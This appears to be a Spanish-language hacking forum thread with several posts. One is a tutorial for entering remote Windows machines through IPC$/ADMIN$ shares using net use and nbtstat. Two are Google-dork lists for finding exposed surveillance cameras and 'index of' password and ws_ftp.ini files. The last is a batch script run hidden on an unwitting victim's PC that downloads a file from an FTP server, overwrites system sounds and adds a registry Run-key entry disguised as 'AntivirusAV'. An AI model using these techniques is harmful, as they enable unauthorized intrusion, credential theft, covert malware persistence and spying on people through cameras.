La Recurso de Admin$ que es el recurso final para poder tomar lo dare es un poco mas trabajoso porque razon???. Porque el recurso de Admin$ por defecto esta protegido con una contraseña, solo hay 2 formas de eludir esa contraseña:
1. Estamos en la misma RED usando un equipo que tiene la cuenta de usuario con permiso de Administrador.
2. Usando un brutalizador que he terminado de programar  para poder conocer la contraseña del Administrador general de la RED.

La primer forma de captar el password puede funcionar local como remotamente, asi nos encontremos localmente en esa RED con una cuenta equivalente a Administrador o remotamente de misma manera.

Que errores tontos noo??

Pero ahora como podemos usar estos recursos desde nuestro equipo ubicado a millas de distancias del que queremos usar????

Secillo!!!!! 

Nos dirigimos a nuestra querida consola de MsDOS, (cmd) para NT, 2000, o XP.

Solo debemos introducir el comando:

Para Windows 9X:

net use \\ipdelamaquinaremota\IPC$

Para Windows NT,2000,XP

net use \\ipdelamaquinaremota\IPC$ * /user:administrador

Nos deberia dar una respuesta como "Comando ejecutado Satisfactoriamente", una ves tenemos esa respuesta colocamos el siguiente comando:

Para windows 9x, NT, 2000, XP:

nbtstat -R
Este comando nos carga en la tabla NETBIOS de nuestro ordenador el ordenador remoto al que nos entramos.

Ahora si somos amantes del DOS, podemos ejecutar los comandos comunes de DIR, MD, COPY, FORMAT  , pero si no nos gusta mucho la interface DOS, al haver hecho el comando nbtstat -R cerramos DOS, y en cualquier ventana de windows en la barra de direcciones colocamos:

\\ipdelamaquinaremota

y listo estamos explorando su computador desde una ventana de windows normal .
--------------------------------------------------------------------

Falencias de esta Tecnica:

1. Solo podremos entrarnos a las maquinas que tengan por lo menos 1 recurso compartido, y en caso de Windows NT no tenga el Service Pack 6 para Windows 2000 menor al service pack 2 y Windows XP que no tenga SERVICE PACK!!!!.

2. Yo la he llamado esta tecnica la tecnica de la "ESPADA" porque razon, porque cuando ingresamos a algun computador local o remotamente estamos estableciendo una sesion NETBIOS para conectarnos, que quiere decir esto??? que si el otro usuario sospecha de que alguien esta metido en su maquina y tiene un conociemiento medio hacia arriva haria 2 cosas:

Con esto tambien pueden defenderse y ATAKAR en caso que se hayan metido a su maquina de esta manera:

1. Abrir DOS y colocar el comando :
nbtstat -s
Nos muestra todas las conecciones ativas que tenemos en nuestro computador, si hay alguien mas conectado a nuestro PC nos los mostrara en ese momento.

2. Abrir DOS y colocar el comando:
nbtstat -R
Chingados..... si el usuario al que estamos atacando coloca este comando se hace el contrafuego! el tambien tiene acceso a nuestros archivos. Tambien el puede colocar nuestra direccion ip en su barra de direcciones y tiene coneccion abiertar a nuestros archivos 

 
Como nos protegeremos
 

 Sencillo! hay 3 formas de protegernos:
1. Si se nos hace que hay alguien en nuestro computador colocamos el comando nbtstat -s y salio la persona conectada has esto:
net use * /delete /yes
Esto borrara todas las conecciones establecidas en tu computador y en ese momento saca todos tus recursos compartidos que tengas.

2. Hacemos lo anterior con el nbtstat -s si hay alguien conectado, en windows XP y 2000 existe las herramientas de administrador, entramos a control de usuarios y Borramos temporalmente las carpetas compartidas que tienen por defecto el windows que son: IPC$, ADMIN$, C$, y si tuvieras mas discos duros aprecerian con el signo de dolar "$" los borras todos, no pasa nada cuando reinicies tu computador apareceran estos recursos nuevamente. QUE ERROR MAS COJ.....

3. A lo asustado, nos desconectamos de internet y repetimos el paso 1 , 2 y nos conectamos nuevamente.

 
El IPC$ y ADMIN$ son recursos que bienen en el windows XP, NT y 2000 por defecto el IPC$ es recurso que se habilita en el momento de tener algo compartido, los recursos C$, D$..... son recursos inaccesibles (a nos ser que tengan acceso de administrador).

 
Que pasa cuando un recurso esta con password??
 

Esto es eludible cuando nos estamos conectado a un equipo, existen varios buscadores de SMB, yo en especial he programado 1 muy rapido y eficaz.
Lo ponder en los archivos de aclantis tan pronto termine de ponerlo "pintudo" el programa 

 
Que pasa cuando me quiero conectar y me pide contraseña
 

Lo siento muchacho, ese equipo ya tiene un Service Pack metido que corrige ese error. Estas OUT!!

 
Se puede averiguar ese password?
 

Claro!!!!!!!!!!! jejejeje  , si no no fueramos Hackers es muy tardoso, tambien he contruido un Brutalizador para poder hallar el password del Administrador, acceso TOTAL! pero eso lo darà   © mucho mas adelante ya que esto podria causar mucho lamerio en la red  .

 
Que hay con los Firewall
 

OBSOLETOS

A no ser que bloqueen el puerto 129 que si estan en una red ya no se van a poder conectar con una maquina remota y si estan usando internet de esa RED estan OUT!

 
Como puedo saber si me puedo entrar a una maquina facilmente?
 

Secillamente, conoces el cargoso y apestoso programa mIRC??? claro ese donde la gente entra a boludear y hacerse la chistosa......  , solo has esto coloca como comando /dns nick, en el nick colocas el nick de la persona que quieras meterte y en el status te deberia salir algo asi:

*Resolving 166.114.156.26 "algun ip cualquiera" ....

*Resolved 166.114.156.26 in (Alverto) "Si nos sale algun nombre en especifico como ese o tambien puede salir el nombre de la computadora estamos IN!!!  "

xBitcoOL: Mucho mas adelante pondre en Aclantis "Fabulosa Pagina" jejejeje los archivos para poder hacer el desencriptamiento del recurso compartido ó Brutalizar el password del Administrador.

Una cosa mas!!!! no se crean los SUPER HACKERS con esta informacion esto es lo mas basico que deberian saber para iniciarse en este gran mundo.....

 
UN REPASO
 

* Solo podemos entrarnos al recurso llamado IPC$, Admin$ y Discos duros "C$, D$" son raros de accesar.

* Esto no quiere decir que cuando entramos por IPC$ no tenemos acceso a nada, Claro que lo tienen!! tienen acceso a todo recurso compartido que tenga el usuario en su computador.

* Si el usuario tiene una impresora compartida y nos muestra en la ventana de windows la podemos instalar y USARLAR jajajaja hagan la prueva los asusta demaciado.... 

* Los comandos utiles para todo esto son:

- net use \\ipremoto\IPC$ (WIN9X)
net use \\ipremoto\IPC$ * /user:administrador (WIN NT,2K,XP)

- Nbtstat -s : Muestra gente conectada en nuestro PC
- Nbtstat -R : Carga el computador a nuestra tabla NETBIOS, si quieres reirte un poco has esto y entra a Entorno de Redes y que es eso??? SI!! jajaja es la computadora que se encuentra en nuestro Entorno de Redes para poder usarla sin pena. 
- net use * /delete /yes: Comando que borra toda coneccion hecha o que nos hicieron a nuestro computador.

- net view \\ipremota: despues de haver hecho el comando net use este comando nos muestra todos los recursos compartidos que tiene el usuario al que nos conectamos a su computador "si somos amantes del DOS" pero si no nos dirigiemos directamente a la barra de direcciones y colocamos "\\ipremoto" y listo.

- DIR, MD, COPY, XCOPY.... comandos basicois que podemos usar en la maquina remota si somos amantes del DOS un ejemplo de usar dir seria: dir \\ipmaquinaremota.

by xBitcoOL

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Hacking google [txs]
« Respuesta #11 : 13/10/2008, 06:49:27 pm »
Bueno... esto lo escribi hace mucho... el 26 de Mayo del 07 para ser exactos jeje (lo pone en la foto qe tome jeje) y se me habia olvidado postearlo aca :P

En fin... simplemente son unas cosas interesantes que puedes sacar gracias a google jojo, "hacking google"   es como se le denomina :D

aca se lo dejo:



HACKING GOOGLE, POR TXSHACK

Bueno, muchos habran oido ya hablar de esto, otros tal vez no.... de todas formas me parece un tema interesante que no esta mal saber y por eso, he publicado este post...
Parte de la informacion la he escrito yo, y otra a sido sacada de otras fuentes...
Me parece una cosa interesante y entretenida con la que pasar el rato, jeje, eso de las camaras en especial jaja, aunque cada uno puede usarlo como le plazca....
Bueno, no voy a entretenerles mas, comenzemos:

Hablemos un poco de google:

Como ya sabran, Google es uno de los buscadores mas utilizados por todo el mundo, y practicamente no hay dia en que no nos conectemos a internet y lo usemos.

Pues bien, cada vez que realizamos busquedas, cada vez que accedemos a sitios usando por google usando nustra pass, que accedemos a sitios privados...etc google lo almacena en su base de datos, quedando esa informacion a disposicion de cualquiera que la pueda explotar.

Antes de seguir con esto, voy a hacerles un pequeño adelanto de lo que se puede hacer, para que no se aburran. hagan clic en You are not allowed to view links. Register or Login
Es una camara de vigilancia de un comercio




Sigamos hablando del Google hacking.

El google hacking consiste en explotar la gran capacidad de almacenamiento informatico de Google, buscando informacion especifica que a sido añadida a las bases de datos del buscador. Si orientamos las busquedas a ciertas palabras clave, nos ayudaran a encontrar informacion privada o sensible, puntos de entrada a posibles ataques o cualquier otro tipo de informacion...

Mostremos algunos ejemplos:

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

Existen muchos mas, claro esta, pero sigamos....

La vigilancia de empresas, casas, comercios etc por medio de camaras de seguridad conectadas a internet con el fin de que puedas vigilar tu negocio desde cualquier punto, esta muy de moda. Sin embargo, muchos administradores dejan la configuracion en el modo default, las cuales permiten a cualquier persona con tan solo usar la busqueda de google, acceder a cientos de camaras de vigilancia...

Basta con hacer busquedas como las siguientes

 inurl :"ViewerFrame ?Mode="

-  intitle :"Live View / - AXIS" | inurl :view/view.shtml

-  inurl :"MultiCameraFra me ?Mode="

-  intitle :"WJ-NT104 Main"

-  intitle :"snc-rz30 home" Requiere plugin Active-X.

-  inurl :"ViewerFrame ?Mode=Motion" Requiere plugin Active-X.

-  inurl :LvAppl intitle :liveapplet

-  intitle :"Live View / - AXIS" Requiere plugin Active-X.

-  "Powered by webcamXP"

-  inurl :indexFrame.sht ml "Axis Video Server"

-  "MOBOTIX M1" and "open menu"

-  intitle :flexwatch intext :"Copyright by Seyeon TECH Co"

Ademas de quese puede buscar por modelos de camaras:

Axis

-  axis video server view.shtml

-  /view/view.shtml axis

-  "adding live video to one of your own pages a very easy task with an AXIS 2100 Network Camera"

-  "Live view - / - AXIS"

-  "Your browser has JavaScript turned off.For the user interface to work effectively"

-  indexFrame.htm l axis

-  "Live web imaging unleashed"

Canon

-  sample/LvAppl/

MOBOTIX

-  /control/userimage.html

JVC

-  "(c)copyright 1999-2003 VICTOR COMPANY OF JAPAN, LIMITED. All rights reserved"

-  "V.Networks Motion Picture(Java)"

-  "Control the Pan/Tilt and move to the Preset Position"

FlexWatch

-  /app/idxas.html

-  "Saving & Retrieving Mode"

Panasonic

-  /ViewerFrame ?Mode=Motion

TOSHIBA

-  "TOSHIBA Network Camera - User Login"

Se necesita Java

Sony

-  /home/homeJ.html

webcamXP (software)

-  "my webcamXP server !"

Pues bien, esto no es todo. Algunos comercios, salas, locales etc, instalan webcams con el proposito de ser publicas o tambien porque han optado por las webcams como medio de vigilancia.
Sin embargo, no han tenido en cuenta que estas imagens de oficinas, locales, negocios etc quedan al alcanze de cualquiera si no se protegen y son descubiertas por las mecionadas busquedas en google...

Para localizarlas, basta con introducir en google, fragmentos de busqueda como por ejemplo:

inurl:"ViewerFrame?Mode="

 intitle:"Live View / - AXIS" | inurl:view/view.shtml

 inurl:"MultiCameraFra me?Mode="

 intitle:"WJ-NT104 Main"

 intitle:"snc-rz30 home" Requiere plugin Active-X.

 inurl:"ViewerFrame?Mode=Motion" Requiere plugin Active-X.

 inurl:LvAppl intitle:liveapplet

 intitle:"Live View / - AXIS" Requiere plugin Active-X.

 "Powered by webcamXP"

 inurl:indexFrame.sht ml "Axis Video Server"

 "MOBOTIX M1" and "open menu"

 intitle:flexwatch intext:"Copyright by Seyeon TECH Co"

También he recopilado estos enlaces por modelos de cámaras:
Axis

 axis video server view.shtml

 /view/view.shtml axis

 "adding live video to one of your own pages a very easy task with an AXIS 2100 Network Camera"

 "Live view - / - AXIS"

 "Your browser has JavaScript turned off.For the user interface to work effectively"

 indexFrame.htm l axis

 "Live web imaging unleashed"

Canon

 sample/LvAppl/

MOBOTIX

 /control/userimage.html

JVC

 "(c)copyright 1999-2003 VICTOR COMPANY OF JAPAN, LIMITED. All rights reserved"

 "V.Networks Motion Picture(Java)"

 "Control the Pan/Tilt and move to the Preset Position"

FlexWatch

 /app/idxas.html

 "Saving & Retrieving Mode"

Panasonic

 /ViewerFrame?Mode=Motion

TOSHIBA

 "TOSHIBA Network Camera - User Login"

Se necesita Java
Sony

 /home/homeJ.html

webcamXP (software)

 "my webcamXP server!"

Algunas cámaras a la vista Desde cámaras inocentes vigilando instalaciones de computadoras, aeropuertos... hasta intrusivas y de supuesta ilegalidad , como la vigilancia de personas.

Un gimnasio You are not allowed to view links. Register or Login

La entrada a la universidad de ciencias de Harvard  You are not allowed to view links. Register or Login

La universidad de Helsinki -1 -2 ,-3, -4  You are not allowed to view links. Register or Login

 Instituto Nacional de Nanotecnología de Canada You are not allowed to view links. Register or Login

     Â¿Una zapateria para niñxs?  You are not allowed to view links. Register or Login

     Â¿Un datacenter?  You are not allowed to view links. Register or Login

 Una sala de billares  You are not allowed to view links. Register or Login

 Vigilando a lxs clientxs de un comercio- 1,-2, -3, -4 You are not allowed to view links. Register or Login

 Vigilando las estanterias de los productos de un comercio-1,-2 .-3, -4 ,-5 ,  You are not allowed to view links. Register or Login

 Vigilando las cajas registradoras de un comercio-1 , -2 ,-3  You are not allowed to view links. Register or Login


 Vigilando a lxs empleadxs y lxs clientes de un comercio -1, -2 -3  You are not allowed to view links. Register or Login

 Varias cámaras vigilando(camera.gnax.ne t) -1, -2 , la sala de You are not allowed to view links. Register or Login

Ire añadiendo informacion en posteriores mensajes a medida que vaya descubriendo cosas.

Un saludo: TxShack

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
hacking google [askatasun]
« Respuesta #12 : 13/10/2008, 06:50:10 pm »
bien, primero hare una breve introduccion:
Todos hemos oido hablar de google, un buen buscador, que ademas se puede utilizar como herramienta de hacking, ese manual esta sacado de la biblia del hacker.
Empecemos con un ejemplo sencillo, seguro que más de una vez, al navegar por internet se ha encontrado un listado de directorios en el navegador como el de la suiguiente imagen



a veces este tipo de ficheros estan expuestos voluntariamente por el webmaster, pero a veces solo lo estan por algun despiste o por desconocimiento de los responsables de la pagina web que estamos visitando a los que no deberia permitir acceso.

veamos ahora cómo conseguir que google muestre este tipo de listados, como se puede ver en la imagen, aparece un texto muy significativo "index of", este textolo pone el propio servidor web cuando muestra un listado de este tipo. si se fija bien tambien aparece dicha frase en el titulo de la pagina por lo que de una manera muy sencilla se ha de llevar a cabo la busqueda con la suiguiente frase:

intitle: "index of"

con esta consulta google nos devueve los resultados de todas kas oaginas que contienen este texto,,  o saldria algo como esto:


para que sea util se ha de concretar mas:

ititle:Index.of "index of" "parent directory"

ahora la busqueda es mas concreta, pero se puede mejorar:

Intitle:index.of "index of" "parent directory " passwd

al añadir esta simple palabra encontraremos algo tan curioso como ficheros desprotegidos a los que podemos acceder a traves del listado.



-Ahora dicho esto mencinonaremos unos ficheros que pueden ser interesantes al atacar un sistema:

1.-Ficheros de contraseñas: este tipo de ficheros son los mas complicados de encontrar por internet, pues es dificil que el sistema nos de acceso a el desde el navegador.

2.- ficheros de configuracion: un fichero de configuracion de cierto servicio o aplicacion puede se muy util para conocer la manera de accedera el. incluso hay aplicaciones que almacenan sus claves de acceso y contraseñas cifradas.

3.- ficheros de log: En este tipo de ficheros aparece informacion que puede ser usada para trazar un mapa red del sitio que quieres atacar.

acabemos con algo sencillo, localizar archivos de configuracion.
para ello se usa una conexion ftp grafica llamada WS_ftp, los ficheros de esta herramiienta tienen el nombrede WS_FTP.ini, en este fichero se guardan claves, usuarios y  parametros de configuracion de esta herramienta, para buscarlos con google:

intitle:index.of "index of" "parent Directory" intext:ws_ftp.ini   
de esta forma google nos mostrara estos ficheros.


La busqueda de contraseñas es mas tediosa y complicada, pero no imposible.

aqui acaba este manual de hacking con google de la bibilia del hacker, es un poco largo pero vale la pena leerlo.
para estas busquedas se utilizan parametros y comandos de busqueda avanzada de google
tambien hay muchos parametros mas que si les interesa (cosa que dudo) podria poner en otro post.

p.d: el manual en si es mucho mas largo y completo, pero he pensado que para empezar con esto ya bastaba, aver si les gusta  ;) lo que no se es como se reducen las imagenes asi que estan un poco grandes.
salu2

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Los secretos de google
« Respuesta #13 : 13/10/2008, 06:55:30 pm »
You are not allowed to view links. Register or Login
« Última Modificación: 24/01/2009, 04:01:57 pm por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Mandar y descargar archivos por FTP
« Respuesta #14 : 18/10/2008, 09:33:17 pm »
Basicamente, si deseamos mandar un archivo a una persona por FTP
y no queremos que esa persona se entere, podemos hacerlo por una shell remota
o le podemos mandar un .bat en modo oculto para mandarlo...

para eso debemos de dominar el FTP en modo consola:

Para eso recomiendo leer este manual:
You are not allowed to view links. Register or Login

y colocare un bat que mandar un archivo de sonido por FTP en modo oculto
para que entiendan el ejemplo y luego lo apliquen ustedes:
-----------------------------------------------------------------------------------------
quise hacer algo que no fuera muy comun... Y se me ocurrio hacer un batch que reproduzca alguna cancion, sin ninguna ventana... Luego de pensar un rato, se me ocurrio la sigte idea:

1. Subir a un FTP un archivo .mp3 o cualquier audio...
2. Hacer que el batch baje el archivo al PC remoto.
3. Reemplazarlo por %systemroot%/media/Entrada de Windows XP.wav
4. Cuando inicie sesion, se reproducira la cancion invisiblemente jojojo...

 Requisitos:
1. Tener un FTP. (acaso no tienen?  Devil)
2. Cuenta no-ip.
3. Un PC remoto ingenuo como objetivo
Código: You are not allowed to view links. Register or Login
@echo off
color a
title Moding Audio 1.0 by NaphacK
rem Usar este bat en modo ghost.
rem deben disponer de un FTP con un archivo.mp3 dentro.
rem Iniciando bat.
rem Guardando datos FTP
echo open>c:\systemaftp.txt
echo TU_SERVIDOR_FTP>>c:\systemaftp.txt
echo USUARIO_DEL_FTP>>c:\systemaftp.txt
echo CONTRASEÑA_DEL_FTP>>c:\systemaftp.txt
echo pwd>>c:\systemaftp.txt
echo ascii>>c:\systemaftp.txt
echo binary>>c:\systemaftp.txt
echo get padrino.mp3 %systemroot%/padrino.mp3>>c:\systemaftp.txt
echo put "c:\systemaftp.txt">>c:\systemaftp.txt
echo bye>>c:\systemaftp.txt
rem Haciendo peticion de achivo.
ftp -s:c:\systemaftp.txt ftp://TU_SERVIDOR_FTP
rem Reemplazando archivos
copy "%systemroot%\padrino.mp3" "%systemroot%/media/Entrada de Windows XP.wav" /y
rem Estas copias que vienen ahora, son opcionales, ya que
rem si hay si se juntan muchas reproducciones, se vuelve
rem un caos.
rem ustedes saben si las dejan o sacan.
rem Por algo es Codigo Abierto! xD
copy "%systemroot%\padrino.mp3" "%systemroot%/media/Parada crítica de Windows XP.wav" /y
copy "%systemroot%\padrino.mp3" "%systemroot%/media/recycle.wav" /y
mkdir "%homedrive%%homepath%\Mis Documentos\virus_NaphacK">%systemroot%/mk.bat
mkdir "c:\virus_NaphacK">>%systemroot%/mk.bat
reg add "hkey_local_machine\software\microsoft\windows\currentversion\run" /v AntivirusAV  /t reg_sz  /d "%systemroot%/mk.bat" /f
rem Ese mkdir, por deduccion, hara que el usuario elimine esa carpeta
rem asi estara ejecutando recycle.wav y se volvera a reproducir el archivo constantemente HA HA HA (risa enferma) xD
pause
exit